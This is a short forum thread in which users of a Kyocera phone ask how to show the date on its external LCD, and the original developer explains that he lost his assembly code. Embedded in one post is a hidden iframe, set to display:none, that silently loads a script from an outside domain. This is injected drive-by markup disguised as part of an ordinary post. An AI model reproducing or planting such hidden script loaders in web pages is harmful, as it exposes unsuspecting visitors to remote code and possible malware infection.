Date display on the lcd

KB2PMD posted awhile back that he was working on a way to do this. Any luck?

I'm wanting this capability bad.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I remember seeing that thread also. There was also a thread on changing the font on the external display. Anybody?

DKR.

Hi, sorry for not posting back on it.. I had it working *somewhat* awhile ago, but then I lost the program to a computer crash. It had been a long time since I'd used assembly language.. if anyone knows it, I'll send them everything I have, and they shouldn't have much trouble figuring it out. I'm getting married in a month, so I've been a little busy. Sorry!

Just checking back on this...
Is there anyway to add the date to the lcd or to have the date display instead of the time?

Jeff

I contacted Kyocera in attempt to get information on programming the LCD or an extended API, and their official response was that there are no plans to release an update of the API. So it looks like we have to wait for someone to tear apart KB2PMD's assembly code and figure it out.

I would volunteer, but I just don't have the time right now.
